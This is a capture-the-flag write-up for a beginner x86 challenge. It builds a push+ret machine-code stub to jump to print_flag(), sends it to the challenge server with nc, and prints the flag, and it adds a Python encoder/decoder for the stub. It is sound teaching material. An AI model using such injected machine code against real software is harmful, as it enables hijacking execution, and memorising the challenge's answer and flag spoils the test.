Junior Hacking Talent - Mã Máy Writeup

❯ nc 188.166.233.168 4790
 -------------------------------------------------
|   080487b4 <print_flag>:                        |
|   080487b4:   55                push   ebp      |
|   080487b5:   89 e5             mov    ebp,esp  |
|   080487b7:   53                push   ebx      |
|   ....                                          |
 -------------------------------------------------

Looking at the assembly, we notice that print_flag() resides at address 0x080487b4; that is the function we need to execute.

There are multiple ways to jump to that function, but what I’ll be using is push+ret.

push        0x080487b4
ret

Essentially, the push instruction puts 0x080487b4 at the top of the stack; ret then pops that value off the stack and places it into EIP, so execution continues at print_flag().

With the help of the handy x86 Instruction Set Reference, we can easily look up the opcodes for push and ret, which are 68 and C2 respectively. Note that 68 is the push imm32 form (opcode followed by a 4-byte immediate), and C2 is strictly the ret imm16 form (pops the return address, then adds a 16-bit immediate to ESP); the plain near ret is C3. Either form pops our address into EIP, which is all that matters here.

Before blindly pushing this address into memory, we need to consider something called endianness. As we’re executing this on the 80386, which uses the little-endian format, the immediate must be stored least-significant byte first: 0x080487b4 becomes the byte sequence b4 87 04 08, i.e. 0xb4870408 when written out as a hex string.
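As an added example (not part of the original writeup), the script below builds the push+ret stub programmatically and decodes it back, so the endianness step and the 68/C2/C3 distinction can be checked rather than taken on faith. The address is the one from the challenge's disassembly; everything else (function names, the tiny decoder) is my own and assumes nothing about the challenge server.

```python
import struct
from typing import List, Optional

# Address of print_flag() as shown in the challenge's disassembly listing.
PRINT_FLAG_ADDR = 0x080487B4

# x86 opcodes used by the stub.
OPCODE_PUSH_IMM32 = 0x68   # push imm32: opcode + 4-byte little-endian immediate
OPCODE_RET = 0xC3          # near ret: pops return address into EIP
OPCODE_RET_IMM16 = 0xC2    # near ret imm16: pops EIP, then adds imm16 to ESP


def encode_push_ret(addr: int, ret_imm16: Optional[int] = None) -> bytes:
    """Encode `push addr; ret` as raw 32-bit x86 machine code.

    struct.pack("<I") emits the immediate least-significant byte first,
    which is why 0x080487b4 lands in memory as b4 87 04 08.
    Passing ret_imm16 selects the C2 form instead of the plain C3 ret.
    """
    if not 0 <= addr <= 0xFFFFFFFF:
        raise ValueError("address must fit in 32 bits")
    code = bytes([OPCODE_PUSH_IMM32]) + struct.pack("<I", addr)
    if ret_imm16 is None:
        code += bytes([OPCODE_RET])
    else:
        code += bytes([OPCODE_RET_IMM16]) + struct.pack("<H", ret_imm16)
    return code


def decode(code: bytes) -> List[str]:
    """Minimal decoder for the three opcodes above, to confirm the round-trip.

    Raises ValueError on truncated or unknown instructions, e.g. a trailing
    C2 with no immediate bytes after it.
    """
    out: List[str] = []
    i = 0
    while i < len(code):
        op = code[i]
        if op == OPCODE_PUSH_IMM32:
            if i + 5 > len(code):
                raise ValueError("truncated push imm32")
            imm = struct.unpack_from("<I", code, i + 1)[0]
            out.append(f"push 0x{imm:x}")
            i += 5
        elif op == OPCODE_RET:
            out.append("ret")
            i += 1
        elif op == OPCODE_RET_IMM16:
            if i + 3 > len(code):
                raise ValueError("truncated ret imm16: C2 needs two immediate bytes")
            imm = struct.unpack_from("<H", code, i + 1)[0]
            out.append(f"ret 0x{imm:x}")
            i += 3
        else:
            raise ValueError(f"unsupported opcode 0x{op:02x}")
    return out


def is_well_formed(code: bytes) -> bool:
    """True if every instruction in `code` decodes completely."""
    try:
        decode(code)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    payload = encode_push_ret(PRINT_FLAG_ADDR)
    print(payload.hex().upper())  # hex string in the form the writeup pipes into nc
    print(decode(payload))
```

The decoder deliberately rejects a lone trailing C2: the ret imm16 form is three bytes long, so a stub that ends in C2 is only complete if two more bytes follow it.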

All that’s left is to combine everything and send it to the CTF server:

echo "68B4870408C2" | nc 188.166.233.168 4790
 -------------------------------------------------
|   080487b4 <print_flag>:                        |
|   080487b4:   55                push   ebp      |
|   080487b5:   89 e5             mov    ebp,esp  |
|   080487b7:   53                push   ebx      |
|   ....                                          |
 -------------------------------------------------

Hãy nhập đoạn mã máy mà em muốn:

Disassembly:

68 b4 87 04 08             push  0x80487b4

Chúc mừng em đã viết mã máy thực thi hàm print_flag() thành công!
Đây là phần thưởng dành cho em CTF{computers_only_understand_machine_code}